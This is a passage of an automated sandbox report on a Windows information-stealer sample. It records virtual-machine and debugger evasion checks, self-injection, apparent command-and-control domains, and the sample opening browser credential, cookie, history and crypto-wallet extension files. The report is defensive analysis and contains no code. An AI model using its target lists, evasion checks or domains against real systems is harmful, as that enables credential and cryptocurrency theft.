Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\h226x41CQ6.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\h226x41CQ6.exe TID: 7452 | Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\Desktop\h226x41CQ6.exe TID: 7624 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\h226x41CQ6.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: Amcache.hve.10.dr | Binary or memory string: VMware
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696492231s
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B86000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.10.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1276150562.0000000001253000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Amcache.hve.10.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696492231f
Source: Amcache.hve.10.dr | Binary or memory string: vmci.sys
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696492231
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.10.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.10.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.10.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.10.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.10.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.10.dr | Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.10.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual USB Mouse
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.10.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.10.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.10.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.10.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B94000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696492231p
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.10.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696492231j
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.000000000121C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1276150562.0000000001253000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT
                Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: C:\Users\user\Desktop\h226x41CQ6.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\h226x41CQ6.exe | Memory written: C:\Users\user\Desktop\h226x41CQ6.exe base: 400000 value starts with: 4D5A
                Source: h226x41CQ6.exe, 00000000.00000002.1503493144.0000000000E8B000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: conceptionnyi.sbs
                Source: h226x41CQ6.exe, 00000000.00000002.1503493144.0000000000E8B000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: platformcati.sbs
                Source: h226x41CQ6.exe, 00000000.00000002.1503493144.0000000000E8B000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: nervepianoyo.sbs
                Source: h226x41CQ6.exe, 00000000.00000002.1503493144.0000000000E8B000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: qualifielgalt.sbs
                Source: h226x41CQ6.exe, 00000000.00000002.1503493144.0000000000E8B000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: smashygally.sbs
                Source: h226x41CQ6.exe, 00000000.00000002.1503493144.0000000000E8B000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: fightyglobo.sbs
                Source: h226x41CQ6.exe, 00000000.00000002.1503493144.0000000000E8B000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: modellydivi.sbs
                Source: h226x41CQ6.exe, 00000000.00000002.1503493144.0000000000E8B000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: pioneeruyj.sbs
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | Process created: C:\Users\user\Desktop\h226x41CQ6.exe "C:\Users\user\Desktop\h226x41CQ6.exe"
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Amcache.hve.10.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.10.dr | Binary or memory string: msmpeng.exe
                Source: Amcache.hve.10.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.10.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001245000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000002.1632344310.000000000121C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.10.dr | Binary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: Process Memory Space: h226x41CQ6.exe PID: 7392, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum-LTC
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
                Source: h226x41CQ6.exe, 00000004.00000003.1559487979.00000000012BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                Source: h226x41CQ6.exe, 00000004.00000003.1559487979.00000000012BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Exodus
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
                Source: h226x41CQ6.exe, 00000004.00000003.1559487979.00000000012BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: h226x41CQ6.exe, 00000004.00000003.1559487979.00000000012BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
